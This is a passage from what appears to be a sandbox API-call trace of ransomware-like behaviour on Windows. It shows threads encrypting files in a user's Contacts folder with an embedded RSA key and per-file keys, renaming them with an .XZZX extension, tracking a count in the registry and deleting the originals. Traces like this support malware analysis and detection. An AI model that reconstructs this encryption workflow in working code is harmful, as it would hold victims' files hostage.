lpOverlapped=0x0) returned 1 [0034.708] SetFilePointer (in: hFile=0x3e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10b4d [0034.708] WriteFile (in: hFile=0x3e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0034.708] SetFilePointer (in: hFile=0x3e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10b52 [0034.708] SetErrorMode (uMode=0x1) returned 0x1 [0034.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0034.708] OutputDebugStringW (lpOutputString="end") [0034.708] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x1eÞ\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0034.708] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0034.708] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3ea980) returned 1 [0034.709] CryptImportPublicKeyInfo (in: hCryptProv=0x3ea980, dwCertEncodingType=0x1, pInfo=0x3dd1638*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1668*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1670*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x324938) returned 1 [0034.709] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.709] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0034.709] CryptEncrypt (in: hKey=0x324938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0034.709] CryptEncrypt (in: hKey=0x324938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eaa08*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eaa08*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0034.709] WriteFile (in: hFile=0x3e0, lpBuffer=0x3eaa08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3eaa08*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0034.709] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0034.709] WriteFile (in: hFile=0x3e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0034.709] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0034.753] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0034.753] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x3f0) returned 0x0 [0034.753] RegQueryValueExW (in: hKey=0x3f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x6, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0034.753] RegCloseKey (hKey=0x3f0) returned 0x0 [0034.753] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x3f0) returned 0x0 [0034.753] RegSetValueExW (in: hKey=0x3f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x7, cbData=0x4 | out: lpData=0x42cdfec*=0x7) returned 0x0 [0034.753] RegCloseKey (hKey=0x3f0) returned 0x0 [0034.753] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.754] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.754] CloseHandle (hObject=0x3e0) returned 1 [0034.764] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0034.765] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0034.765] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact")) returned 1 [0034.766] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact")) returned 0 Thread: id = 98 os_tid = 0x624 [0034.535] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.535] lstrcpyW (in: lpString1=0x3f8f460, lpString2="asdlfk poopvy.contact" | out: lpString1="asdlfk poopvy.contact") returned="asdlfk poopvy.contact" [0034.535] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.535] SetErrorMode (uMode=0x1) returned 0x1 [0034.535] lstrcpyW (in: lpString1=0x3f8f860, lpString2="asdlfk poopvy.contact" | out: lpString1="asdlfk poopvy.contact") returned="asdlfk poopvy.contact" [0034.535] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xa02e258a, Data2=0xd8e, Data3=0x4083, Data4=([0]=0xbb, [1]=0x9c, [2]=0x81, [3]=0xac, [4]=0x53, [5]=0xa8, [6]=0x6f, [7]=0xa9))) returned 0x0 [0034.535] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0034.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0034.535] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\3180D48C036A6FAAA02E258A076353F2.XZZX") returned 80 [0034.535] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="XZZX") returned 0x0 [0034.535] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", dwFileAttributes=0x20) returned 1 [0034.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e0 [0034.536] ReadFile (in: hFile=0x3e0, lpBuffer=0x3ddb728, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3ddb728*, lpNumberOfBytesRead=0x3f8e418*=0x493, lpOverlapped=0x0) returned 1 [0034.537] CloseHandle (hObject=0x3e0) returned 1 [0034.537] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0034.537] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0034.538] SetErrorMode (uMode=0x1) returned 0x1 [0034.538] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0034.538] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea8f8) returned 1 [0034.540] CryptGenKey (in: hProv=0x3ea8f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3249b8) returned 1 [0034.783] CryptExportKey (in: hKey=0x3249b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0034.783] CryptExportKey (in: hKey=0x3249b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0034.783] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.784] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0034.784] CryptDestroyKey (hKey=0x3249b8) returned 1 [0034.784] CryptReleaseContext (hProv=0x3ea8f8, dwFlags=0x0) returned 0 [0034.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\3180D48C036A6FAAA02E258A076353F2.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\3180d48c036a6faaa02e258a076353f2.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0034.784] WriteFile (in: hFile=0x3d8, lpBuffer=0x3ddb728*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3ddb728*, lpNumberOfBytesWritten=0x3f8e438*=0x493, lpOverlapped=0x0) returned 1 [0034.786] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x493 [0034.786] WriteFile (in: hFile=0x3d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.786] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x498 [0034.786] WriteFile (in: hFile=0x3d8, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x2a, lpOverlapped=0x0) returned 1 [0034.787] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c2 [0034.787] WriteFile (in: hFile=0x3d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.787] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c7 [0034.787] SetErrorMode (uMode=0x1) returned 0x1 [0034.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0034.787] OutputDebugStringW (lpOutputString="end") [0034.787] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wx\"Þ\x03`Õø\x03â", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0034.787] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0034.787] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3eab18) returned 1 [0034.788] CryptImportPublicKeyInfo (in: hCryptProv=0x3eab18, dwCertEncodingType=0x1, pInfo=0x3dd1158*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1188*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1190*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x3249b8) returned 1 [0034.788] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.788] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0034.792] CryptEncrypt (in: hKey=0x3249b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0034.793] CryptEncrypt (in: hKey=0x3249b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eaba0*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eaba0*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0034.793] WriteFile (in: hFile=0x3d8, lpBuffer=0x3eaba0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3eaba0*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0034.793] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0034.793] WriteFile (in: hFile=0x3d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.793] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0034.793] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0034.793] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x3e4) returned 0x0 [0034.793] RegQueryValueExW (in: hKey=0x3e4, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0x7, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0034.793] RegCloseKey (hKey=0x3e4) returned 0x0 [0034.793] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x3e4) returned 0x0 [0034.793] RegSetValueExW (in: hKey=0x3e4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x8, cbData=0x4 | out: lpData=0x3f8dfec*=0x8) returned 0x0 [0034.794] RegCloseKey (hKey=0x3e4) returned 0x0 [0034.794] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.794] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.795] CloseHandle (hObject=0x3d8) returned 1 [0034.795] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0034.796] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0034.796] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact")) returned 1 [0034.796] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact")) returned 0 Thread: id = 99 os_tid = 0x63c [0034.766] lstrcpyA (in: lpString1=0x43cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.766] lstrcpyW (in: lpString1=0x43cf460, lpString2="chucu jadnvk.contact" | out: lpString1="chucu jadnvk.contact") returned="chucu jadnvk.contact" [0034.766] lstrcpyW (in: lpString1=0x43ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.766] SetErrorMode (uMode=0x1) returned 0x1 [0034.767] lstrcpyW (in: lpString1=0x43cf860, lpString2="chucu jadnvk.contact" | out: lpString1="chucu jadnvk.contact") returned="chucu jadnvk.contact" [0034.767] CoCreateGuid (in: pguid=0x43ce440 | out: pguid=0x43ce440*(Data1=0xf401616c, Data2=0xe1ac, Data3=0x4370, Data4=([0]=0x9c, [1]=0x62, [2]=0xe2, [3]=0x12, [4]=0x3f, [5]=0x3d, [6]=0x55, [7]=0xf7))) returned 0x0 [0034.767] wsprintfW (in: param_1=0x43cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0034.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x43cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0034.767] wsprintfW (in: param_1=0x43ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\278D60903B72BF40F401616C3FAFA388.XZZX") returned 80 [0034.767] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="XZZX") returned 0x0 [0034.767] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", dwFileAttributes=0x20) returned 1 [0034.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4 [0034.797] ReadFile (in: hFile=0x3b4, lpBuffer=0x3ddb728, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x43ce418, lpOverlapped=0x0 | out: lpBuffer=0x3ddb728*, lpNumberOfBytesRead=0x43ce418*=0x499, lpOverlapped=0x0) returned 1 [0034.798] CloseHandle (hObject=0x3b4) returned 1 [0034.798] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0034.799] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0034.799] SetErrorMode (uMode=0x1) returned 0x1 [0034.799] lstrcpyW (in: lpString1=0x43ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0034.799] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eaa90) returned 1 [0034.802] CryptGenKey (in: hProv=0x3eaa90, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324a38) returned 1 [0034.982] CryptExportKey (in: hKey=0x324a38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x43ce41c | out: pbData=0x0*, pdwDataLen=0x43ce41c*=0x94) returned 1 [0034.982] CryptExportKey (in: hKey=0x324a38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x43ce41c | out: pbData=0x3e60000*, pdwDataLen=0x43ce41c*=0x94) returned 1 [0034.982] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.983] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0034.983] CryptDestroyKey (hKey=0x324a38) returned 1 [0034.983] CryptReleaseContext (hProv=0x3eac28, dwFlags=0x0) returned 0 [0034.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\278D60903B72BF40F401616C3FAFA388.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\278d60903b72bf40f401616c3fafa388.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e4 [0034.983] WriteFile (in: hFile=0x3e4, lpBuffer=0x3ddb728*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x3ddb728*, lpNumberOfBytesWritten=0x43ce438*=0x499, lpOverlapped=0x0) returned 1 [0034.984] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x499 [0034.984] WriteFile (in: hFile=0x3e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0034.984] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49e [0034.984] WriteFile (in: hFile=0x3e4, lpBuffer=0x43cf860*, 